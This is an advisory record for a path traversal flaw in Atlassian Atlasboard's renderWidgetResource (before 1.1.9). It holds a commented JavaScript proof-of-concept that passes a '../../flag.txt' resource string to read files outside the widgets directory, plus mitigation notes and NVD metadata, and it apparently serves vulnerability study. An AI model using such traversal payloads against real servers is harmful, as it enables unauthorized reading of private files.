The renderWidgetResource resource in Atlassian Atlasboard before version 1.1.9 allows remote attackers to read arbitrary files via a path traversal vulnerability.
// Proof-of-concept harness for the CWE-22 path traversal in Atlasboard's
// renderWidgetResource (affects versions before 1.1.9 per the advisory text above).
// NOTE(review): the listing is not runnable as shown — string quotes are escaped
// (`\"`), `fs` is used on the sendFile line without being in scope on this page,
// and a top-level `await` appears next to a CommonJS `require`. Treat it as an
// illustrative reproduction, not a test fixture.
const widget = require(\"atlasboard/lib/webapp/routes/widget\");
// Mock req and res
// `req` is not consulted here; only `res` matters for observing the outcome.
const req = {};
const res = {
sendFile: (filePath) => {
// Read and return file contents synchronously
// Success path: if the handler hands back a path outside the widgets directory,
// the traversal succeeded and the file contents are printed.
const data = fs.readFileSync(filePath, \"utf8\");
console.log(\"Contents of /flag.txt:\");
console.log(data);
},
status: function (code) {
// Records the status so `send` can report it; returns `this` for chaining.
this.statusCode = code;
return this;
},
send: function (msg) {
// Failure path: a non-file response (e.g. a rejection by a patched version)
// surfaces here as a thrown error, so a fixed install makes this script fail.
throw new Error(`Server responded with status ${this.statusCode}: ${msg}`);
},
};
// localPackagesPath set to root to allow traversal to /flag.txt
const localPackagesPath = \"/\";
// resource string with path traversal to escape localPackagesPath and widgets directory
// Mitigation (defender's view): per the advisory the resource segment is presumably
// joined onto the base path without being confined to it; the standard fix is to
// resolve the joined path and reject any result that is not under the intended
// widgets directory. Operators should verify the deployed version is >= 1.1.9 and
// can alert on `..` segments in widget resource requests as a detection signal.
const resource = \"../../flag.txt\";
// Call vulnerable function
await widget.renderWidgetResource(localPackagesPath, resource, req, res);
{
"nvd_published_at": "2021-09-01T06:15:00Z",
"cwe_ids": [
"CWE-22"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2021-09-02T16:35:00Z"
}